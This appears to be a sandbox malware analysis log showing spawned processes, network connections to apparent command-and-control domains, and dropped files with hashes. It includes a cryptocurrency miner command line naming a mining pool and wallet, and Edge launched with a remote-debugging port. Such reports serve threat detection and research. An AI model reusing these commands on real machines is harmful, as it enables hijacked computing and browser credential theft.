"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,520738765909682596,17289151312896282781,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4824 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,520738765909682596,17289151312896282781,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3428 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,520738765909682596,17289151312896282781,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2080 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,520738765909682596,17289151312896282781,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4008 /prefetch:2

C:\Windows\System32\notepad.exe

--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff247a46f8,0x7fff247a4708,0x7fff247a4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,8166851807276498781,17229299231230154271,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,8166851807276498781,17229299231230154271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,8166851807276498781,17229299231230154271,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2072,8166851807276498781,17229299231230154271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2072,8166851807276498781,17229299231230154271,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10109740101\1e6d93a433.exe

"C:\Users\Admin\AppData\Local\Temp\10109740101\1e6d93a433.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,8166851807276498781,17229299231230154271,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,8166851807276498781,17229299231230154271,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2

Network

Country Destination Domain Proto
RU 185.215.113.16:80 185.215.113.16 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 dugong.ydns.eu udp
DE 38.180.229.217:80 dugong.ydns.eu tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.180.14:443 clients2.google.com tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 142.250.180.14:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.169.65:443 clients2.googleusercontent.com udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.42:443 ogads-pa.googleapis.com udp
GB 216.58.201.110:443 apis.google.com udp
GB 142.250.200.42:443 ogads-pa.googleapis.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
RU 176.113.115.7:80 176.113.115.7 tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9229 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9229 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
DE 38.180.229.217:80 dugong.ydns.eu tcp
GB 142.250.180.14:443 clients2.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 172.217.169.65:443 clients2.googleusercontent.com tcp
GB 142.250.200.42:443 ogads-pa.googleapis.com udp
GB 142.250.200.42:443 ogads-pa.googleapis.com tcp
GB 142.250.200.14:443 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9229 tcp
US 20.189.173.21:443 nw-umwatson.events.data.microsoft.com tcp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9229 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 104.21.24.225:443 farmingtzricks.top tcp
DE 38.180.229.217:80 dugong.ydns.eu tcp
US 104.21.24.225:443 farmingtzricks.top tcp
DE 5.75.210.149:443 tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.180.14:443 clients2.google.com tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 172.217.169.65:443 clients2.googleusercontent.com tcp
GB 142.250.200.42:443 ogads-pa.googleapis.com tcp
GB 142.250.200.42:443 ogads-pa.googleapis.com udp
GB 142.250.200.14:443 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.65.92:443 nw-umwatson.events.data.microsoft.com tcp
N/A 127.0.0.1:9229 tcp
US 104.21.9.123:443 moderzysics.top tcp
N/A 127.0.0.1:9229 tcp
US 104.21.9.123:443 moderzysics.top tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9229 tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 ls.t.goldenloafuae.com udp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 104.86.110.200:80 e5.o.lencr.org tcp
US 8.8.8.8:53 avx.medianewsonline.com udp
BG 185.176.43.98:80 avx.medianewsonline.com tcp
BG 185.176.43.98:80 avx.medianewsonline.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
BG 185.176.43.98:80 avx.medianewsonline.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
GB 142.250.180.14:443 clients2.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com udp
GB 172.217.169.65:443 clients2.googleusercontent.com tcp
GB 142.250.200.42:443 ogads-pa.googleapis.com tcp
GB 142.250.200.42:443 ogads-pa.googleapis.com udp
GB 142.250.200.14:443 play.google.com tcp
GB 142.250.200.14:443 play.google.com udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 explorebieology.run udp
US 104.21.9.123:443 moderzysics.top tcp
DE 38.180.229.217:80 dugong.ydns.eu tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
N/A 127.0.0.1:9223 tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
GB 142.250.180.14:443 clients2.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 172.217.169.65:443 clients2.googleusercontent.com tcp
US 104.21.9.123:443 moderzysics.top tcp
GB 172.217.169.65:443 clients2.googleusercontent.com tcp
GB 142.250.200.42:443 ogads-pa.googleapis.com udp
GB 142.250.200.42:443 ogads-pa.googleapis.com tcp
GB 142.250.200.14:443 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
N/A 127.0.0.1:9229 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9229 tcp
N/A 127.0.0.1:9223 tcp
CH 185.208.156.162:80 185.208.156.162 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 52.168.117.173:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.112.1:443 exarthynature.run tcp
US 104.21.112.1:443 exarthynature.run tcp
US 104.21.112.1:443 exarthynature.run tcp
US 8.8.8.8:53 pastebin.com udp
US 104.21.112.1:443 exarthynature.run tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.21.112.1:443 exarthynature.run tcp
N/A 127.0.0.1:9223 tcp
US 104.21.112.1:443 exarthynature.run tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
NL 185.156.73.73:80 185.156.73.73 tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 40.69.146.102:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 104.21.24.225:443 farmingtzricks.top tcp

Files

C:\Users\Admin\AppData\Local\Temp\2QhO5XQHn.hta

MD5 634a8f08e8ce217a42e782b0942e60ad
SHA1 51778040b7f96c0506085bcbe10d301f84d4fcfb
SHA256 7f724b1782c80216a836536de3a2f7d2805a9fc9723349d0803a6e2ef457391a
SHA512 69326de5c57df8fbf473675808855ea5775584a043516b4cc5d2672df33cd2896900d7b055070681f13e9801f3b48fb43ccf91dd647298bc2654765c816fbd76

memory/4180-2-0x0000000002770000-0x00000000027A6000-memory.dmp

memory/4180-3-0x0000000004E30000-0x0000000005458000-memory.dmp

memory/4180-4-0x00000000054A0000-0x00000000054C2000-memory.dmp

memory/4180-5-0x0000000005540000-0x00000000055A6000-memory.dmp

memory/4180-6-0x00000000056E0000-0x0000000005746000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_azl35qok.hly.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4180-16-0x0000000005850000-0x0000000005BA4000-memory.dmp

memory/4180-17-0x0000000005D40000-0x0000000005D5E000-memory.dmp

memory/4180-18-0x0000000005DE0000-0x0000000005E2C000-memory.dmp

memory/4180-19-0x0000000007470000-0x0000000007AEA000-memory.dmp

memory/4180-20-0x0000000006260000-0x000000000627A000-memory.dmp

memory/4180-22-0x0000000007290000-0x0000000007326000-memory.dmp

memory/4180-23-0x0000000007220000-0x0000000007242000-memory.dmp

memory/4180-24-0x00000000080A0000-0x0000000008644000-memory.dmp

C:\Users\Admin\AppData\Local\TempTVXR4YOPHTSKSYBE4URBIYIWATTQ9C5A.EXE

MD5 93da4bdbae52d91d32a34c140466e8cf
SHA1 2177f234160ef77058d2237a8f97c1d663647240
SHA256 878228e580cd27a72a847922f9b16b7d16d0797c68aa9e6642ae3da13518de7a
SHA512 14d14d6d8d436953ed43483b8b3ba30a4f1df73eb2eca055c047bb0b7e328150ae0c49122a657f5f8ab752872e5d40b791e793675110df5c90440077f446b91a

memory/2532-32-0x0000000000050000-0x0000000000512000-memory.dmp

memory/2532-47-0x0000000000050000-0x0000000000512000-memory.dmp

memory/4072-48-0x0000000000990000-0x0000000000E52000-memory.dmp

memory/2664-50-0x0000000000990000-0x0000000000E52000-memory.dmp

memory/2664-52-0x0000000000990000-0x0000000000E52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe

MD5 f0ad59c5e3eb8da5cbbf9c731371941c
SHA1 171030104a6c498d7d5b4fce15db04d1053b1c29
SHA256 cda1bd2378835d92b53fca1f433da176f25356474baddacdd3cf333189961a19
SHA512 24c1bf55be8c53122218631dd90bf32e1407abb4b853014f60bac1886d14565985e9dea2f0c3974e463bd52385e039c245fffb9f7527b207f090685b9bede488

memory/4072-66-0x0000000000990000-0x0000000000E52000-memory.dmp

memory/5080-67-0x0000000000E60000-0x000000000155E000-memory.dmp

memory/4072-69-0x0000000000990000-0x0000000000E52000-memory.dmp

memory/5080-70-0x0000000061E00000-0x0000000061EF3000-memory.dmp

\??\pipe\crashpad_1440_PLJSBWNEQJLDOUZQ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\10109460101\a4f9d6c063.exe

MD5 f70735d9afe78b36b385aecd58d64663
SHA1 f5526224478b24bf07d530b544eeeb894baeaa61
SHA256 354f0d829d6336318c2aa940d3e9aeaedea7ea74fc10d36cae23880f7e161514
SHA512 eae3afcae8c0a6b3e7cc901a2f0d422d46156d455f7e550468f8529fe0638c4a4476f5013706c023eae667b0fbf03796673f05167c76e998d1e0adadd990c653

C:\Users\Admin\AppData\Local\Temp\L2Zsbgj3b.hta

MD5 157743ac94d20864ef171ecd4679ad78
SHA1 8087328cba1a3b440961075a8cbe29202de484e5
SHA256 d24e415db2a5fc811f35c7f20749d7ddab517117474e29ca855ef56275201314
SHA512 38312bd94008207ed2f7defd956960141ae6c209e34eabd6730d3bcbfe8cd109503f3661a85056fd4c6452c37be6bf48ccd3b1166684434f84b70e790e978021

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 25604a2821749d30ca35877a7669dff9
SHA1 49c624275363c7b6768452db6868f8100aa967be
SHA256 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

memory/4988-144-0x0000000005930000-0x0000000005C84000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 be896cdb17ad0a9bd2814d7d175cf18d
SHA1 3509f4c3169260992a96cb23ddd7acd26ebcaacd
SHA256 31f84b111f5f7c3b6d9f1b56ce6d25fdc3a77f8ed3d09ece0ffb03c48c71874f
SHA512 b875eef51116b42219fb05ed07c6883fe5719cbd7d5eb469158ae425614403143e44ae9569a9118ef47948c9f23f57e8e07532c623d2aadaae045f2f4c39eff1

memory/4988-146-0x0000000006220000-0x000000000626C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scoped_dir1440_172012187\c0634edd-d4b3-45ee-bfc9-8d10ad4d318e.tmp

MD5 eae462c55eba847a1a8b58e58976b253
SHA1 4d7c9d59d6ae64eb852bd60b48c161125c820673
SHA256 ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad
SHA512 494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

C:\Users\Admin\AppData\Local\Temp\scoped_dir1440_172012187\CRX_INSTALL\_locales\en_CA\messages.json

MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

C:\Users\Admin\AppData\Local\Temp\10109470121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 c2f36644238776ac5fd88b86b9f4d9e5
SHA1 a350c5a0059dbc21ea353c9f9951c4c65437b3ba
SHA256 8f26a044f2b95478214c91196a9cddff9b3ab4f4bc19a57f39c10c6d8de59f9f
SHA512 ff7c3508be8f0e18fabe4293df8fad38b75735a884597d484b9b284a21410b4c89f51702f0f90387e6f1f0e7ac06a53c1a7798a64a5e063b6c3ef3309ccf35ae

C:\Users\Admin\AppData\Local\TempEJ2UCZ1HYNU1HJ5ZECHIBJQ3LSJUMM3S.EXE

MD5 263c138a572348641f4c4e4451297d61
SHA1 c58ed81f7612b64b7079e025984a067219210f32
SHA256 163aad56ff7ef3148b01db769fa22ad6b490dccb982a45e7d589f3fa57fd5b20
SHA512 79eba38d90d16375dfda3f462d49a71343ec3d79c8241f573bfb82c25fd0f8e4a56fce27d6262cc8d1872fde8862d8c1773f9bc8783249b21f853343aa31bc34

memory/5932-568-0x0000000000D50000-0x00000000011F2000-memory.dmp

memory/5080-567-0x0000000000E60000-0x000000000155E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e27df0383d108b2d6cd975d1b42b1afe
SHA1 c216daa71094da3ffa15c787c41b0bc7b32ed40b
SHA256 812f547f1e22a4bd045b73ff548025fabd59c6cba0da6991fdd8cfcb32653855
SHA512 471935e26a55d26449e48d4c38933ab8c369a92d8f24fd6077131247e8d116d95aa110dd424fa6095176a6c763a6271e978766e74d8022e9cdcc11e6355408ab

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\3a3b5f35-7e63-45af-8d4c-4d62777f3c7b.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 395082c6d7ec10a326236e60b79602f2
SHA1 203db9756fc9f65a0181ac49bca7f0e7e4edfb5b
SHA256 b9ea226a0a67039df83a9652b42bb7b0cc2e6fa827d55d043bc36dd9d8e4cd25
